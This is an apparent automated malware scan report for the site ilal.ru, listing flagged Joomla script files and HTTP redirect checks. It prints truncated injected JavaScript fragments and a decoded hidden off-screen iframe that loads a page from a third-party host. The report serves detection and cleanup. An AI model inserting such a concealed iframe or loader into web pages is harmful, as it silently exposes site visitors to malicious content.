Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ilal.ru
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ilal.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:50 GMT Location: http://www.ilal.ru/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=cgg0g9l9jrgl9d3knrq3anf0e5; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/ | 200 OK Content-Length: 98725 Content-Type: text/html | clean |
http://www.ilal.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 29622 Content-Type: application/x-javascript | malicious |
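Malicious code, confirmed by antivirus engines (see below). The excerpt that follows is truncated: the injected fragment breaks off mid-string inside the change_user list, and the text after the break appears to be the tail of the original JComments file. "Decoded script" is the markup the scanner recovered from the fragment, a 125x125 iframe positioned off-screen that loads a page from a third-party host. The same decoded iframe is reported for six script files in this scan, so cleanup should cover every flagged file, not only this one.
(function(){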
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://ilal.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 6204 Content-Type: application/x-javascript | clean |
http://www.ilal.ru/templates/gk_corporate2/js/domready_fix.js | 200 OK Content-Length: 3429 Content-Type: application/x-javascript | clean |
http://ilal.ru/media/system/js/caption.js | 200 OK Content-Length: 4308 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below); the excerpt that follows is truncated. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch container.className = container.className + " " + align; container.setAttribute("style","float:"+align); if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_tab/scripts/engine_compress.js | 200 OK Content-Length: 5681 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below); the excerpt that follows is truncated. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_tab/scripts/importer.php?modid=tabs_right_1&activator=click&animation=0&animationFun=Fx.Transitions.linear&animationType=1&animationSpeed=250&animationInterval=5000&styleType=0&styleSuffix=style1&fixedHeight=0&fixedHeightValue=200&alwaysHide=0 | 200 OK Content-Length: 388 Content-Type: text/javascript | clean |
http://www.ilal.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 4714 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below); the excerpt that follows is truncated. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_news_highlighter/scripts/engine_compress.js | 200 OK Content-Length: 6858 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below); the excerpt that follows is truncated. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=250&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1 | 200 OK Content-Length: 252 Content-Type: text/javascript | clean |
http://www.ilal.ru/templates/gk_corporate2/js/gk.script.js | 200 OK Content-Length: 9243 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below); the excerpt that follows is truncated. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch element.addEvent('click',function(event){ var event = new Event(event); event.preventDefault(); changeStyle(index+1); }); }); new SmoothScroll(); } }); function changeStyle(style){ var file = tmplurl+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk36_style',style,{duration: 200,path: "/"}); };;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/templates/gk_corporate2/js/menu/mega.js | 200 OK Content-Length: 20339 Content-Type: application/x-javascript | clean |
http://www.ilal.ru/templates/gk_corporate2/js/gk_image_show.js | 200 OK Content-Length: 10244 Content-Type: application/x-javascript | clean |
http://ilal.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:56 GMT Location: http://www.ilal.ru/index.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=ekg5dtr27lvijn9gjipqts9q75; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:56 GMT Location: http://www.ilal.ru/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=g8ladjpfvpbgjo2mtch2utjf55; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://ilal.ru/bolezni/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:56 GMT Location: http://www.ilal.ru/bolezni/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=6ao2qa77i04pb22u3c1g3grlp1; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/bolezni/ | 200 OK Content-Length: 25033 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ilal.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 12 Jul 2014 01:28:50 GMT
Location: http://www.ilal.ru/
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=cgg0g9l9jrgl9d3knrq3anf0e5; path=/
X-Powered-By: PHP/5.3.3
...0 bytes of data.
GET / HTTP/1.1
Host: ilal.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 12 Jul 2014 01:28:50 GMT
Location: http://www.ilal.ru/
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=cgg0g9l9jrgl9d3knrq3anf0e5; path=/
X-Powered-By: PHP/5.3.3
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilal.ru
Referer: http://www.google.com/search?q=ilal.ru
Result:
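The result is similar to the first query; no suspicious redirects were found. This check covers only the server's HTTP responses to these two requests. The injected scripts listed under "Scanned pages/files" run in the visitor's browser, so a clean result here does not mean the site is clean.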
GET / HTTP/1.1
Host: ilal.ru
Referer: http://www.google.com/search?q=ilal.ru
Result:
The result is similar to the first query; no suspicious redirects were found.